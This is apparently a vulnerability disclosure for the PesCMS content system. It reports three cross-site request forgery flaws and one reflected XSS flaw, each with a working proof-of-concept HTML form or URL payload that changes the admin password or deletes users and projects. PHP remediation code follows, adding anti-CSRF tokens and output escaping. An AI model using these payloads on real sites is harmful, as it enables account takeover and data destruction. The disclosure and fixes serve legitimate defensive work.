pescms_vulnerability

Cross Site Request Forgery (CSRF) - 1

Modify the admin's password, mail, phone and profile image.

Technical description: file: pescms/App/Team/PUT/User.php

This file modifies personal information, but it does not verify whether the operation is legitimate (the request is accepted on the strength of the session cookie alone). Through it an attacker can modify the admin's password, mail, phone and profile image.

Proof of Concept(PoC)

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=User&a=setting" method="POST">
      <input type="hidden" name="method" value="PUT" />
      <input type="hidden" name="name" value="admin" />
      <input type="hidden" name="mail" value="123456&#64;qq&#46;com" />
      <input type="hidden" name="phone" value="" />
      <input type="hidden" name="password" value="newadmin" />
      <input type="hidden" name="home" value="Team&#45;Index&#45;index" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

image1

Success. The admin's password has been modified.
image2

Cross Site Request Forgery (CSRF) - 2

Delete the administrator's and other members' accounts.

Technical description: files:

pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php

Through these, any member or administrator can be deleted just by changing the 'id' in the URL. Deleting the administrator's account only requires setting the id to '1'.
image3

Proof of Concept(PoC)

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=User&a=action&id=36&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVVzZXImYT1pbmRleA==" method="POST">
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Visit the PoC page:
image4
image5

After refreshing the user list, we find that the user called "light" has been deleted.
image6

Cross Site Request Forgery (CSRF) - 3

Delete important information.

Technical description: files:

pescms/App/Team/DELETE/Attachment.php
pescms/App/Team/DELETE/Content.php
pescms/App/Team/DELETE/Field.php
pescms/App/Team/DELETE/Model.php
pescms/App/Team/DELETE/Notice.php

Through CSRF, important data can be deleted via every one of these files.

None of the delete operations is verified on the front end. Like this:
image7

Proof of Concept(PoC)

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pescms/Public/?g=Team&m=Project&a=action&id=1&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVByb2plY3QmYT1pbmRleA==" method="POST">
      <input type="hidden" name="" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

image8, after refresh:
image9

Other delete operations exist in this CMS as well. Only their locations are given here; they are not proven.
image10
image11
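The three CSRF findings above share one root cause: the PUT/User.php and DELETE/*.php handlers act on any request that arrives with a valid session cookie, without proof that the request was made from the CMS's own pages. Below is an added example of the server-side fix a maintainer would apply, written for this page and not taken from PesCMS; the function names, the `csrf_token` form field and the `SITE_ORIGIN` constant are assumptions, and the two requests at the bottom are constructed.

```php
<?php
// Added example (not PesCMS code): a session-bound anti-CSRF token that the
// Team/PUT/User.php and Team/DELETE/*.php handlers would check before changing
// anything. Function names, the csrf_token field and SITE_ORIGIN are assumptions.

const SITE_ORIGIN = 'http://localhost';   // scheme://host[:port] of the CMS, no trailing slash

/** Issue (or reuse) a random per-session token. */
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Hidden field to embed in every state-changing form the CMS renders. */
function csrf_field(array &$session): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Return true only for a request that carries the session's token in the POST
 * body (a form on another site cannot read it) and, when the browser sent an
 * Origin header, comes from our own site. hash_equals() compares in constant time.
 */
function csrf_verify(array $post, array $server, array $session): bool {
    $submitted = $post['csrf_token'] ?? '';
    $expected  = $session['csrf_token'] ?? '';
    if (!is_string($submitted) || $submitted === '' || $expected === '') {
        return false;
    }
    if (!hash_equals($expected, $submitted)) {
        return false;
    }
    if (isset($server['HTTP_ORIGIN']) && $server['HTTP_ORIGIN'] !== SITE_ORIGIN) {
        return false;
    }
    return true;
}

// Demonstration with constructed requests (no real PHP session needed).
$session = [];
$field   = csrf_field($session);   // would be printed inside the legitimate form

// The forged PoC form above: right action, right cookie, but no token.
$forged  = csrf_verify(['method' => 'PUT', 'name' => 'admin', 'password' => 'newadmin'],
                       ['HTTP_ORIGIN' => 'http://attacker.example'], $session);

// The CMS's own form: token present, origin matches.
$genuine = csrf_verify(['method' => 'PUT', 'name' => 'admin', 'csrf_token' => $session['csrf_token']],
                       ['HTTP_ORIGIN' => SITE_ORIGIN], $session);

printf("forged request accepted: %s\ngenuine request accepted: %s\n",
       var_export($forged, true), var_export($genuine, true));

// In a real handler such as the DELETE action, at the very top:
//   if (!csrf_verify($_POST, $_SERVER, $_SESSION)) { http_response_code(403); exit; }
```

The token must be read from the POST body, never from the query string: the delete endpoints above already take `id`, `method=DELETE` and `back_url` from the URL, so a token passed the same way could be pre-filled in a forged link just as easily. The Origin comparison is defence in depth only; browsers send that header on cross-site POSTs, but the session-bound token is what actually stops the attack.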

Reflected XSS in App/Team/GET/Report.php

CSRF also exists in the extract method, but this section demonstrates the reflected XSS, not the CSRF.

In lines 72-78, the data from $_GET['begin'] and $_GET['end'] is assigned to variables and output in the page without encoding.
image12

Proof of Concept(PoC)

localhost/pescms/Public/?g=Team&m=Report&a=extract&begin="onmouseover=alert(1)//&end=&user=0
or
localhost/pescms/Public/?g=Team&m=Report&a=extract&begin=&end="onmouseover=alert(1)//&user=0
or, on the page:
http://localhost/pescms/Public/?g=Team&m=Report&a=allExtract&begin="onmouseover=alert(1)//&user=0

image13

On this page the reflected XSS can be combined with the CSRF, which causes far greater damage.
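The payload works because the `begin` and `end` values are echoed straight into an HTML attribute, so a leading double quote closes the `value="..."` and the rest becomes a new attribute. The following added example (written for this page, not PesCMS code) shows the two-layer fix a maintainer would apply: validate the parameters as dates, then encode whatever is output. The helper names are assumptions, as is the assumption that `begin` and `end` are Y-m-d dates; the two inputs at the bottom are constructed.

```php
<?php
// Added example (not PesCMS code): validate and escape the begin/end
// parameters that Team/GET/Report.php echoes back into the page.
// Helper names are assumptions; the parameters are assumed to be Y-m-d dates.

/** Escape a value for an HTML attribute or element body (UTF-8, both quote styles). */
function e(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Accept only a real calendar date in Y-m-d form; anything else becomes ''. */
function clean_date($value): string {
    if (!is_string($value)) {          // rejects missing values and begin[]=... arrays
        return '';
    }
    $d = DateTime::createFromFormat('Y-m-d', $value);
    return ($d !== false && $d->format('Y-m-d') === $value) ? $value : '';
}

/** Render the date-range inputs the report page shows back to the user. */
function render_range_inputs(array $get): string {
    // Validation first (reject junk), encoding second (whatever is left cannot
    // break out of the attribute even if validation is later relaxed).
    $begin = e(clean_date($get['begin'] ?? null));
    $end   = e(clean_date($get['end'] ?? null));
    return '<input type="text" name="begin" value="' . $begin . '">' . PHP_EOL
         . '<input type="text" name="end" value="' . $end . '">' . PHP_EOL;
}

// Constructed inputs: the payload from the PoC above, and a legitimate range.
$forged = ['begin' => '"onmouseover=alert(1)//', 'end' => ''];
$normal = ['begin' => '2020-01-01', 'end' => '2020-01-31'];

echo "Forged request renders as:", PHP_EOL, render_range_inputs($forged);
echo "Normal request renders as:", PHP_EOL, render_range_inputs($normal);

// With validation the forged value is dropped entirely; even without it, e()
// would turn the leading double quote into &quot;, keeping the value inside
// the attribute so no onmouseover handler is ever created.
```

Encoding alone already closes the reported hole, but validating the expected format as well keeps the report logic from receiving values that were never dates, and it is what limits the blast radius if the same parameters are later used in a database query or a filename.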
